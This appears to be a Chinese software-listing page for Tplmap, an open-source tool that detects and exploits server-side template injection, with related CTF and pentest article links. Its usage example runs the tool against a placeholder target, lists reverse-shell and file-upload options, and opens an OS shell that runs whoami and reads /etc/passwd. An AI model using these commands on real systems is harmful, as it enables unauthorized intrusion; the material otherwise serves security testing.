注入漏洞检测工具 Tplmap

GPLv3
Python 查看源码»
跨平台
2016-08-03

自动检测和发掘服务器端模板的注入漏洞。支持测试Mako, Jinja2, Jade, Smarty, Freemarker, Velocity, 和Twig。

示例:

$ ./tplmap.py -u 'http://www.target.com/app?id=*' 
[+] Tplmap 0.1
    Automatic Server-Side Template Injection Detection and Exploitation Tool

[+] Found placeholder in GET parameter 'inj'
[+] Smarty plugin is testing rendering with tag '{*}'
[+] Smarty plugin is testing blind injection
[+] Mako plugin is testing rendering with tag '${*}'
...
[+] Freemarker plugin is testing blind injection
[+] Velocity plugin is testing rendering with tag '#set($c=*)\n${c}\n'
[+] Jade plugin is testing rendering with tag '\n= *\n'
[+] Jade plugin has confirmed injection with tag '\n= *\n'
[+] Tplmap identified the following injection point:

  Engine: Jade
  Injection: \n= *\n
  Context: text
  OS: darwin
  Technique: render
  Capabilities:

   Code evaluation: yes, javascript code
   Shell command execution: yes
   File write: yes
   File read: yes
   Bind and reverse shell: yes

[+] Rerun tplmap providing one of the following options:

   --os-shell or --os-cmd to execute shell commands via the injection
   --upload LOCAL REMOTE to upload files to the server
   --download REMOTE LOCAL to download remote files
   --bind-shell PORT to bind a shell on a port and connect to it
   --reverse-shell HOST PORT to run a shell back to the attacker's HOST PORT

$ ./tplmap.py -u 'http://www.target.com/app?id=*' --os-shell
[+] Run commands on the operating system.

linux $ whoami
www-data
linux $ ls -al /etc/passwd
-rw-r--r--  1 root  wheel  5925 16 Sep  2015 /etc/passwd
linux $

支持的模板引擎:

Template engineDetectionCommand executionCode evaluationFile readFile write
Makorender+blindyespythonyesyes
Jinja2render+blindyespythonyesyes
Nunjucksrender+blindyesjavascriptyesyes
Jaderender+blindyesjavascriptyesyes
Smarty (unsecured)render+blindyesPHPyesyes
Freemarkerrender+blindyesnoyesyes
Velocityrendernononono
Twigrendernononono
Smarty (secured)rendernononono


的码云指数为
超过 的项目
加载中
请先登录后再评论。

暂无资讯

暂无问答

[BUUOJ记录] [BJDCTF 2nd]fake google

本题考查python jinjia2的ssti,其实tplmap直接梭哈都可以 随便输入一个值,查看源代码就能看到一个Hint: 用下面的流程图测试一下,看看是什么模板引擎: 用Payload测试之后发现是jinjia2的模...

03/22 21:01
33
0
SSTI(模板注入)

SSTI简介 何为模板引擎(SST) 百度百科:模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,用于网站的模板引擎就会生成...

2019/04/18 04:19
28
0
[WesternCTF2018]shrine

0x00 知识点 SSTI模板注入: 模板注入涉及的是服务端Web应用使用模板引擎渲染用户请求的过程 服务端把用户输入的内容渲染成模板就可能造成SSTI(Server-Side Template Injection) 0x01模板引擎...

01/28 20:09
33
0
服务端模版注入漏洞检测payload整理

服务端模版注入漏洞产生的根源是将用户输入的数据被模版引擎解析渲染可能导致代码执行漏洞 下表涵盖了java,php,python,javascript语言中可能使用到的模版引擎,如果网站存在服务端模版注入在...

2018/04/07 13:17
52
0
[WesternCTF2018]shrine

0x00 知识点 SSTI模板注入: 模板注入涉及的是服务端Web应用使用模板引擎渲染用户请求的过程 服务端把用户输入的内容渲染成模板就可能造成SSTI(Server-Side Template Injection) 0x01模板引擎...

07/30 09:03
21
0
9.6. 漏洞利用/检测

文章目录 9.6. 漏洞利用/检测 9.6.1. 数据库注入 9.6.2. 非结构化数据库注入 9.6.3. 数据库漏洞利用 9.6.4. XSS 9.6.5. SSRF 9.6.6. 模版注入 9.6.7. 命令注入 9.6.8. PHP 9.6.9. LFI 9.6.10...

08/03 14:46
18
0
PYthon继承链(egg)的思考和实战;

起初学习ssti的时候,就只是拿着tplmap一顿乱扫,然后进行命令执行,之前深入学习了一下PYthon继承链;今天写个文章进行加深记忆和理解; 基础知识 **class ** 返回一个实例所属的类; 这里可...

05/25 15:00
64
0
[转帖]Scanners-Box 指引

作者:杨文 链接:https://zhuanlan.zhihu.com/p/26534414 来源:知乎 著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。 原文地址: We5ter/Scanners-Box https://git...

2019/04/18 23:38
25
0
Python工具库(感谢backlion整理)

漏洞及渗透练习平台: WebGoat漏洞练习平台: https://github.com/WebGoat/WebGoat webgoat-legacy漏洞练习平台: https://github.com/WebGoat/WebGoat-Legacy zvuldirll漏洞练习平台: http...

2019/10/22 08:54
58
0
渗透资源大全-整理

渗透资源大全-整理 漏洞及渗透练习平台: ZVulDrill https://github.com/710leo/ZVulDrill SecGen Ruby编写的一款工具,生成含漏洞的虚拟机 https://github.com/cliffe/secgen btslab渗透测试...

2018/01/03 18:54
69
0

没有更多内容

加载失败,请刷新页面

返回顶部
顶部